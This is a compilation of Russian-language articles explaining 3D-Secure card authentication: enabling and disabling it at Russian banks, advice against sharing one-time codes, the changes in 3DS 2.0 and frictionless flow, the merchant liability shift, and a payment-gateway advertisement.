Если вы сомневаетесь, есть ли на вашей карте 3D-Secure, то развеять все сомнения можно двумя способами. Позвонить в банк или попробовать совершить оплату в Интернете. Первый способ надежней, так как некоторые банки, например, Альфа Банк, автоматически подключает 3D-Secure своим клиентам, но использует технологию не при всех онлайн платежах. Необходимо принудительно подключить 3D-Secure, если вы хотите полную защиту. В этом случае ни одна оплата через Интернет не пройдет, пока вы не введете секретный код.

Как подключить или отключить 3D-Secure

Подключение или отключение 3D-Secure доступно через банк, выпустивший карту. При подключении помните, что 3D-Secure – это бесплатная технология. Независимо от банка, Visa и MasterCard обязывают банки предоставлять технологию бесплатно. Платным может быть вариант лишь с покупкой специального устройства, генерирующего секретные коды – токена.

Для подключения 3D-Secure к своей карте вам придется оставить заявление. Если ваша карта поддерживает платежи в Интернете, то вам не могут отказать в подключении технологии. Отказ в подключении – это прямое нарушение правил платежных систем.

Технология автоматически подключается к большинству карт. Например, она есть на карте Tinkoff Black. Если вам по какой-либо причине нужно отключить 3D-Secure, то это возможно также через обращение в банк. Отключение требуется, например, если вы уезжаете за рубеж, где ваш номер точно не будет работать. Банк может отказать в отключении технологии.

Если вы переезжаете в другую страну, то вы можете не отключать технологию, а просто сменить номер. Некоторые российские банки, например, Альфа Банк, позволяет указать иностранный номер для получения секретных кодов.

Читайте также:  Дебетовая Автокарта банка Открытие

Безопасность

3D-Secure – это технология необходимая каждому, чья карта поддерживает оплату через сеть Интернет. Даже если вы сами далеки от совершения покупок онлайн, то и вам нужно подключить 3D-Secure к своей карте. Иначе вы рискуете стать жертвой кражи денег, ведь без 3D-Secure с вашей карты можно оплатить любую покупку в сети Интернет. А вы узнаете об этом лишь постфактум.

Ни одна технология не сможет гарантировать вам 100% безопасность. Но без 3D-Secure ваша карта и ваши деньги – это легкая добыча для мошенников. Если вы решите подключить 3D-Secure (или не отключать ее), то обязательно используйте одноразовые пароли.

Известны случаи мошенничества, когда злоумышленники совершали платеж украденной картой и звонили жертве, представляясь банковскими сотрудниками и просили сообщить код. Одновременно украсть данные карты и узнать телефон владельца – это сложное дело, но реально осуществимое. Будьте бдительны и запомните главное правило – никогда не сообщайте никому свой секретный код. Вы можете использовать код только сами и только на официальной странице подтверждения оплаты.

Технология уязвима и для компьютерных вирусов. Если ваша симка, куда приходят SMS с паролями от банка, работает в смартфоне на базе Android, то установите антивирус и на телефон. Существуют вирусы для телефона, когда жертва даже не замечает, что пришла нежданная СМС от банка. На самом деле, вирус сам инициировал оплату картой, получил сообщение с кодом, использовал код и удалил его с телефона.

Никогда не сохраняйте данные карты в браузере. Даже если технология 3D-Secure у вас включена, то возможно, что ваш банк использует ее не для всех транзакций. Такое бывает с карточками Visa в банке Тинькофф. В результате, мошенникам будет достаточно украсть ваши сохраненные данные, а код им даже не потребуется.

Обмануть систему можно, но обмануть вас еще проще. Поэтому оберегайте свои личные данные и помните, что 3D-Secure значительно увеличивает безопасность платежей в сети, но не гарантирует вам 100% сохранность.

Автор статьи, эксперт по финансам

Привет, я автор этой статьи. Имею высшее образование. Специалист по финансам и банкам. Более 3-х лет работал в коммерческих банках РФ. Пишу про финансы более 5 лет. Всегда в теме по лучшим вкладам и картам. Делаю выгодные вклады и получаю высокий кешбек по картам. Поставьте пожалуйста оценку моей статье, это поможет улучшить ее.

Материалы по теме

встречаем 3-D Secure 2.0 / Хабр

Что такое 3D Secure?

Первая версия 3D Secure была разработана для того, чтобы повысить доверие потребителей к онлайн-платежам, что поспособствовало росту электронной коммерции. Чтобы защититься от мошеннических операций, 3D Secure добавляет ещё один шаг аутентификации для онлайн-платежей, позволяющий торговым точкам и банкам дополнительно убедиться, что платеж совершает именно держатель карты. Во время использования 3D Secure 1 система отображает всплывающее окно или встроенный фрейм, требуя от пользователя ввода пароля, чтобы банк мог аутентифицировать пользователя. Однако учетные данные объекта, генерирующего всплывающее окно, не могут быть аутентифицированы.

• Продавец (merchant) несет ответственность за сделку
  
• Продавец (merchant) должен вернуть покупателю деньги (chargeback)
  

Каковы основные изменения в протоколе 3D Secure 2.0?

• дополнительный шаг, необходимый для завершения платежа, увеличивает сложности процесса размещения заказа и может привести к тому, что клиенты откажутся от покупки.
  
• ряд банков по-прежнему обязует владельцев своих карт создавать и запоминать свои собственные статические пароли для завершения проверки 3D Secure. Эти пароли легко забыть, что также может привести к более высокой вероятности отказа от покупки.
  
• Негативное влияние на пользовательский опыт (UX) особенно заметно в мобильных приложениях. Когда Visa впервые создала стандарт 3D Secure, персональные компьютеры были единственным каналом, доступным для потребителей, чтобы делать покупки онлайн.  На мобильных устройствах применение 3D Secure может перенаправить клиентов из собственного приложения на веб-сайт банка, который не оптимизирован для мобильных устройств.
  

1. Flexible Device & Channel Support (Гибкая поддержка различных устройств и каналов).

Обеспечивает более плавное и последовательное взаимодействие с пользователем по нескольким каналам оплаты, включая оплату в браузере мобильного телефона, платежи в приложениях и платежи через цифровой кошелек.

2. Improved User Experience (Улучшенный пользовательский опыт).

Обеспечивает продавцам (merchants) возможность лучше интегрировать процесс аутентификации в процесс покупок, предоставляя держателям карт быструю, простую и удобную аутентификация при высоком уровне безопасности. В отличие от статических паролей, в 3D Secure 2 используются методы динамической аутентификации, такие как биометрия и аутентификация на основе токенов. Также 3D Secure 2 позволит компаниям встраивать поток вызовов непосредственно в свои веб-потоки и потоки мобильных платежей — без необходимости каких -либо перенаправлений. Используя новые мобильные SDK, компании смогут внедрять собственные потоки в свои приложения, которые больше не будут требовать от своих клиентов перехода на поток через браузер для завершения транзакции.

3D Secure 1 (3D Secure 2 Stripe guide):

Frictionless Flow позволяет эмитентам одобрить транзакцию, не требуя ручного ввода данных от владельца карты. Это достигается с помощью так называемой «аутентификации на основе рисков» (RBA). RBA работает, собирая набор данных о держателях карт во время транзакции и передавая их банку-эмитенту и его Access Control Servers (ACS), который затем сравнивает собранные данные с предыдущими (историческими) данными о транзакциях держателя карты для вывода значения риска мошенничества, соответствующего новой транзакции. 3D Secure 2 позволит компаниям и их поставщикам платежей безопасно отправлять более 100 элементов данных по каждой транзакции в банк держателя карты. Сюда входят данные, относящиеся к оплате, такие как адрес доставки, а также контекстные данные, такие как идентификатор устройства клиента или история предыдущих транзакций.

Банк держателя карты может использовать эту информацию для оценки уровня риска транзакции и выбора подходящего ответа. Если значение риска мошенничества ниже заданного порогового значения, применяется Frictionless flow (беспрепятственный поток). Другими словами, если риск мошенничества достаточно низок, то банк-эмитент не будет запрашивать дополнительную проверку у держателя карты и считает, что владелец карты прошел проверку подлинности. Это исключает этап ручной проверки, который всегда требовался от владельцев карт в 3D Secure 1:

1) Если данных достаточно для того, чтобы банк мог поверить в то, что реальный владелец карты совершает покупку, транзакция удовлетворяет требованиям Frictionless flow (беспрепятственного потока), и аутентификация завершается без влияния на взаимодействие с пользователем — владелец карты никогда не видит никаких признаков того, что 3D Secure был применен. Другими словами, если риск мошенничества достаточно низок, то банк-эмитент не будет запрашивать дополнительную проверку у держателя карты и считает, что владелец карты прошел проверку подлинности. Это исключает этап ручной проверки, который всегда требовался от владельцев карт в 3D Secure 1.

2) В случае, когда значение риска мошенничества выше предварительно определенного порога, например, банк решит, что ему нужны дополнительные доказательства, транзакция выполняется в режиме Challenge, и клиента просят предоставить дополнительные данные для проверки подлинности платежа.

Также значительные различия в PSD2 включают изменение ответственности продавцов (merchants) в случае мошенничества. Эмитенты являются явными бенефициарами более широкого обмена данными, необходимыми для 3DS 2.0, поскольку они несут ответственность за любые возвратные платежи (chargebacks). Чем больше данных у них есть, тем точнее они могут оценить риск транзакции.

Тем не менее, продавцы (merchants) также получают выгоду, особенно если они еще не собирают достаточное количество данных по транзакции, которые потребуются для участия в 3DS, потому что тогда они могут использовать эти данные для улучшения своих собственных усилий для обнаружения мошенничества. Но даже если у продавца уже есть сложная программа предотвращения мошенничества, не следует упускать из виду дополнительный уровень защиты, предоставляемый эмитентом, проводящим собственную оценку риска. Поставщики ACS, используемые эмитентами, обычно имеют доступ к источникам данных о мошенничестве, которых нет у отдельных продавцов, что часто позволяет им предоставлять более надежную оценку риска мошенничества.

Когда платежные системы будут поддерживать 3-D Secure 2.0?

• апрель 2019 года: дата действия для Европы
• август 2019 года: дата активации для Канады, Латинская Америка и США.
• апрель 2020 года: дата активации для Азиатско-Тихоокеанский региона и стран Ближнего Востока и Африки.

Для европейского бизнеса вступление в силу в сентябре 2019 года нового регламента, известного как строгая аутентификация клиентов (Strong Customer Authentication, SCA), который будет применяться к онлайн-платежам в Европейском экономическом пространстве (EEA), где банк держателя карты и провайдер платежных услуг находятся в EEA, делает 3D Secure 2 еще более важным. Поскольку новое правило потребует применять больше аутентификации к европейским платежам, 3D Secure 2 предложит лучший UX (пользовательский опыт), чтобы минимизировать влияние на конверсию сайта.

Хотя 3D Secure 2 будет основным методом соблюдения требований SCA к платежам по картам, ожидается, что Frictionless flow (беспрепятственный поток) не будет рассматриваться как форма строгой аутентификации клиентов. Это будет означать, что после введения в действие SCA в Европе Frictionless flow может использоваться только для платежей, которые подпадают под исключение (в то время как все платежи, требующие SCA, должны будут аутентифицироваться с использованием потока Challenge).

3D Secure — что это, как работает, принципы, как включить

3D Secure — простая технология, которой уже больше 10 лет. Она защищает и продавца и покупателя и банки, их обслуживающие, при совершении операций с пластиковыми картами. Однако ее использование сопряжено с некоторыми «особенностями» для владельца карты, которые мы рассмотрим в этой статье. 

Принцип работы 3D Secure

Вместо того, чтобы просто передавать данные о платеже по цепочке Магазин -> Банк, его обслуживающий -> Банк, выпустивший карту и списывать деньги с иногда ничего не подозревающего владельца карты, что сопряжено с рисками, технология включает самого владельца карты в эту цепочку, который должен ввести одноразовый пароль, однозначно свидетельствующий о том, что сделка одобрена.

Основная идея в том, что в процессе принятия решения о том, можно ли совершить платеж, вмешиваются сами платежные системы — Visa, MasterCard и т.п. которые через альтернативные каналы связи (например через SMS на мобильный телефон) отправляют специальный одноразовый код, который затем спрашивают в диалоговом окне.

Совпал код — значит пользователь дал добро на сделку — деньги переводятся. Нет кода или не совпал — может быть это был кто-то другой — сделка отменяется.

Преимущества 3D Secure для владельцев пластиковых карт

В России, где не так просто отозвать простой платеж по банковской карте, подключение и использование технологии 3D Secure имеет огромное преимущество. В этом случае все сделки совершаются только через ввод одноразового пароля. Правда большинство российских банков (Тинькофф, Сбербанк, ВТБ и многие другие) допускают одновременно как проведение операций с использованием технологии, так и без нее.

При проведении операции при использовании 3D Secure сделка считается совершенной от имени покупателя и претензии банк практически не принимает. В случае, если магазин ей не пользуется, есть некоторый шанс вернуть деньги, если клиент заявит, что средства с карты были списаны незаконно.

Как подключить 3D Secure в Сбербанке и в ВТБ?

В подавляющем большинстве банков РФ такая услуга подключается бесплатно и автоматически уже активирована с каждой новой картой. Банки заинтересованы в ее использовании так как она существенно снижает уровень мошенничества, по сути сводя все случаи его фиксации к вине самого пользователя.

Если необходимо отключить услугу, то с этим могут возникнуть серьезные проблемы. В большинстве банков ее использование жестко «вшито» в бизнес-процесс обработки платежей и отключить ее в карточных продуктах не представляется возможным.

Является ли использование технологии 3D Secure для владельца карты гарантией защиты от мошенничества?

Однозначно нет! Для банков эта технология потому и является привлекательной, что перекладывает всю ответственность на клиента.

Да, в случае, если что-то в процессе обработки пойдет неверно, например введенный неправильно код будет воспринят как правильный, то виноват будет банк или процессинговый центр. Но вероятность такого события практически равна нулю.

Другое дело, что клиент может иметь, например, зараженный вирусом сотовый телефон, который будет читать его SMS и отправлять верные коды. Или доверить кому-то постороннему код, который будет введен вместо владельца карты (в чистом виде социальная инженерия). Или просто забыть, что он хотел заплатить ту или иную сумму в магазин. Но в любом случае ответственность за платеж будет лежать на клиенте. Банк существенно экономит средства и силы на разборе спорных транзакций, просто напросто отказывая клиентам.

Следует, однако, иметь в виду, что общий объем мошенничества с применением пластиковых карт снижается. Еще одной потенциальной «дырой» может являться готовность банка выполнять транзакций без отправки кода на телефон. В этом случае клиент должен добиваться своих прав и требовать возврата денег, так как операция была проведена без использования 3D Secure.

Преимущества для магазинов и продавцов

Каждый интернет-магазин или продавец имеет право использовать такую технологию или нет. В случае применения он получает дополнительное преимущество — защиту от так называемого фрода — т.е. по западным законам покупатель может заплатить деньги, но затем потребовать их назад, если будет утверждать, что разрешения на оплату он не давал и за него это сделал кто-то другой. В России те же правила, но у нас все немного сложнее.

При использовании 3D Secure сделка считается утвержденной и вернуть деньги уже не так просто. В случае, если магазин решает использовать технологию, он должен на своем сайте разместить соответствующие логотипы:

Можно ли покупать в интернет магазинах без таких логотипов и без 3D Secure? И безопасно ли это?

На многих ресурсах утверждается, что лучше не покупать. Но я считаю, что можно. И вот почему:

• Использование технологии требуется и выгодно скорее банкам и продавцу. Так как помогает доказать, что именно покупатель дал указание на совершение платежа. В случае, если покупаем мы сами, у нас самих таких проблем не возникает. Мы точно знаем что мы это мы.
• Банк и так проведет операцию без 3D Secure, если ее инициирует мошенник. К покупке в конкретном магазине это не имеет никакого отношения. В этом случае придется обращаться в банк, который направит владельца карты в полицию писать заявление;
• Множество крупных магазинов не тратятся на использование этой технологии. Среди них, например, AliExpress, Amazon, Steam и другие. И все они живут без проблем, закладывая в свои бизнес-процессы возможный ущерб от фрода, но зато получая возможность списывать деньги со счета клиента самым простым способом — по его распоряжению. И даже взимать ежемесячные платежи без участия клиента — например за подписки на свои сервисы.

Что такое аутентификация 3D secure и как она работает?

3D secure, также называемая аутентификацией 3D secure или 3DS, — это мера предотвращения мошенничества, которая была первоначально запущена Visa (как Verified-by-Visa) еще в 2001 году.

Он действует как дополнительный уровень безопасности при приеме платежей по картам. Это дает вашим клиентам безопасный этап аутентификации, прежде чем они смогут совершать покупки в Интернете; убедиться, что они используют правильные реквизиты карты, чтобы защитить себя от мошенничества с платежными картами.

Наряду с Visa, он теперь поддерживается и признается основными эмитентами дебетовых и кредитных карт, включая Mastercard (как Mastercard Secure Code) и American Express (как American Express SafeKey).

Как работает аутентификация 3D secure?

Вы наверняка уже сталкивались с 3D-безопасностью аутентификации, если когда-либо платили за что-то в Интернете.

Это работает так, что, когда клиент готов заплатить за что-то в Интернете, он перенаправляется на страницу 3D-безопасности своего поставщика дебетовой или кредитной карты на своем веб-сайте.

На веб-сайте их провайдеров либо будет предложено ввести пароль (который они уже установят в своем банке), либо потребуется ввести код аутентификации (который будет автоматически отправлен на их подтвержденный номер мобильного телефона).

После того, как они предоставят правильные данные, платеж будет одобрен поставщиком карты, и они будут направлены обратно на ваш веб-сайт.

Все это будет сделано очень быстро, и, вернувшись на ваш сайт, покупатель получит подтверждение, что платеж был успешным.

Преимущества использования 3D secure

Используя 3D-безопасность для онлайн-платежей, вы защитите свой бизнес и своих клиентов от возможного мошенничества с карточными платежами.

После того, как транзакции прошли процесс аутентификации 3D secure, вы больше не несете ответственности за покупку. Это означает, что вы не только будете защищены от любых несанкционированных возвратных платежей по транзакциям, но также сэкономите время и деньги благодаря меньшему количеству возможных споров между вашими клиентами.

Ответственность передается поставщику карточных платежей. Если у вас есть клиент, который утверждает, что он не санкционировал платеж, провайдер карты будет нести ответственность за управление возвратом денег клиенту.

Для ваших клиентов технология 3D secure означает, что вы предоставите им дополнительный уровень безопасности, когда дело доходит до покупок в Интернете. Благодаря системе защиты от мошенничества он может помочь бороться с любым платежным мошенничеством, сохраняя данные карт ваших клиентов в безопасности и помогая обеспечить их доверие к вашему бизнесу.

Plus, они смогут совершать онлайн-платежи с помощью основных дебетовых или кредитных карт, которые используют безопасную систему аутентификации, включая Visa (через Verified-by-Visa), Mastercard (через Mastercard Secure Code) или American Express (через American Express. SafeKey), предоставляя им больший выбор.

Что мне нужно для начала?

Чтобы начать принимать онлайн-платежи с использованием аутентификации 3D secure, вам сначала нужно выбрать поставщика карточных платежей (также известного как эквайер), который использует 3D secure как часть своей безопасности онлайн-платежей.Вы можете прочитать в нашем блоге о том, что следует учитывать при выборе провайдера карты.

Вам также потребуется создать аккаунт продавца. Это означает, что всякий раз, когда вы совершаете онлайн-платеж через свой веб-сайт, средства транзакции будут депонироваться и храниться на счете, чтобы их можно было безопасно и надежно обрабатывать.

Если вы готовы принимать платежи через свой веб-сайт, мы можем помочь. Наши решения для платежных шлюзов включают в себя стандартную аутентификацию 3D secure, а также новейшие функции безопасности, включая IP-адрес, проверки AVS и CVV.

Их можно легко интегрировать с вашим сайтом несколькими способами, связав вашу учетную запись продавца с рядом основных тележек для покупок в Великобритании, таких как Magento, Prestashop и WooCommerce. Полный список совместимых тележек для покупок можно найти в нашей зоне поддержки для разработчиков.

Соответствие PCI

Наш платежный шлюз соответствует требованиям безопасности PCI Level 1. Вам необходимо будет убедиться, что ваша компания соответствует требованиям PCI, что означает принятие собственных мер безопасности, чтобы гарантировать сохранность данных ваших клиентов.

Мы предоставляем услугу по обеспечению соответствия требованиям PCI, чтобы вы могли обеспечить полное соответствие и защитить данные как вас, так и ваших клиентов, когда дело доходит до совершения онлайн-платежей.

Заинтересованы в безопасных онлайн-платежах? Без комиссии за установку и доступного короткого 12-месячного контракта начните принимать платежи онлайн с Payzone. Запросите бесплатное предложение сегодня.

3D Secure: новый процесс оплаты для VISA и Mastercard

В 2000 году VISA разработала процедуру, которая сделала использование кредитных карт в Интернете более безопасным. Сама компания использует технологию под названием «Verified by VISA». В то же время другие поставщики кредитных карт также внедрили механизм безопасности. Например, 3D Secure известен как SecureCode (теперь «Проверка личности») для MasterCard, «SafeKey» для American Express и «J / Secure» для JCB.

Раньше оплата кредитной картой в Интернете была очень простой: вы вводили данные своей кредитной карты и подтверждали владение картой с помощью кода проверки карты (CVC) , который можно найти на обратной стороне.Однако этот метод не был особенно безопасным.

Поскольку электронная коммерция продолжает развиваться, и все больше и больше людей используют методы онлайн-платежей , интерес к онлайн-мошенничеству также растет . Фишинг и социальная инженерия — распространенные способы доступа преступников к данным. 3D Secure был разработан для предотвращения этого.

Помимо информации, содержащейся на карте, для процедуры аутентификации 3D Secure требуется дополнительная информация, такая как пароль, которую знает только владелец карты.Это известно как двухфакторная аутентификация: для завершения транзакции по карте требуются два разных шага.

Использование статических паролей представляет собой угрозу безопасности: если третья сторона получит эту информацию, безопасность будет поставлена ​​под угрозу. Поэтому лучше подходят динамические методы, которые адаптируются к каждому процессу. Например, текстовое сообщение с защищенным кодом, созданным в соответствии с загадочными процедурами, которое можно использовать только для одного конкретного платежа.

И покупатели, и интернет-магазины были недовольны первой версией 3D Secure.Веб-сайт для ввода дополнительного фактора безопасности был плохо спроектирован, а приложение и использование необходимого пароля были непонятны. Кроме того, этот процесс нелегко интегрировать в мобильные приложения. Клиенты были разочарованы и отменяли заказы, а это никогда не годится для бизнеса.

Вторая версия 3D Secure, также известная как 3DS2, решает эти проблемы и повышает безопасность. Новые функции также соответствуют новой Директиве ЕС по платежным услугам .Кроме того, компании, выпускающие кредитные карты, реагируют на технические разработки новой версией. Сегодня современные устройства (например, смартфоны) используют методов аутентификации с биометрическими данными : по отпечатку пальца или путем анализа черт лица.

3D Secure 2.0 разработан таким образом, чтобы интернет-магазины могли интегрировать эту процедуру в процесс оплаты, чтобы сделать покупки более приятными для покупателя. Кроме того, это должна быть интеллектуальная система. Таким образом, метод аутентификации адаптируется к риску, а это означает, что к небольшим суммам применяются более низкие требования безопасности, чем к большим.Кроме того, 3DS2 также может использоваться для мобильных платежей и работает с банковскими приложениями.

Что такое Visa 3-D Secure 2.0 и как оно работает?

Цифровая коммерция — самая быстрорастущая область платежей, поскольку все больше подключенных устройств становятся платежными устройствами. У потребителей есть больше способов платить, чем когда-либо прежде, будь то через браузер, мобильное приложение или подключенное устройство. Сегодняшние шесть миллиардов подключенных устройств превысят 20 миллиардов в следующие три года. Но когда потребитель совершает цифровую покупку не в традиционном магазине, проверка транзакции и личности потребителя становится все более важной и сложной задачей.По оценкам отраслевых исследований, половина транзакций цифровой торговли, отклоненные из-за подозрений в мошенничестве, действительно являются законными²

По этой причине как никогда важно, чтобы отрасль продолжала инвестировать в новые подходы к предотвращению мошенничества, сохраняя скорость и удобство, которые клиенты любят при совершении покупок в Интернете. Если помочь эмитентам и продавцам отличить хорошие транзакции от плохих, это снизит вероятность мошенничества, при этом транзакции будут продолжаться с молниеносной скоростью.3-D Secure 2.0 — важное достижение в этом направлении, которое поможет предотвратить мошенничество и ускорить цифровую торговлю с помощью быстрой и безопасной аутентификации.

Как работает 3-D Secure 2.0? Проще говоря, лучший, более сильный интеллект для обнаружения мошенничества.

3-D Secure существует уже много лет и создает соединение данных аутентификации между цифровыми торговцами, платежными сетями и финансовыми учреждениями, чтобы иметь возможность анализировать и делиться большей информацией о транзакциях. Новый 2.0 обеспечивает безопасный конвейер обмена информацией в режиме реального времени, который продавцы могут использовать для отправки беспрецедентного количества атрибутов транзакции, которые эмитент может использовать для более точной аутентификации клиентов без запроса статического пароля или замедления торговли.

Чтобы у эмитентов и продавцов было время для тестирования, пилотирования, доработки и полного развертывания решений, текущие правила Visa для транзакций 3-D Secure, предпринимаемых продавцом, будут распространяться на 3-D Secure 2.0 с апреля 2019 года.Продавцы и эмитенты уже работают над их внедрением, и Visa ожидает, что раннее внедрение начнется во второй половине 2017 года. Visa продолжит работу с клиентами и партнерами по всему миру для поддержки решений 3-D Secure 2.0, уделяя особое внимание дальнейшему совершенствованию платежей. безопасность и увеличение разрешений, чтобы обеспечить беспроблемный процесс цифровых платежей.

Посмотреть и скачать полную инфографику можно здесь.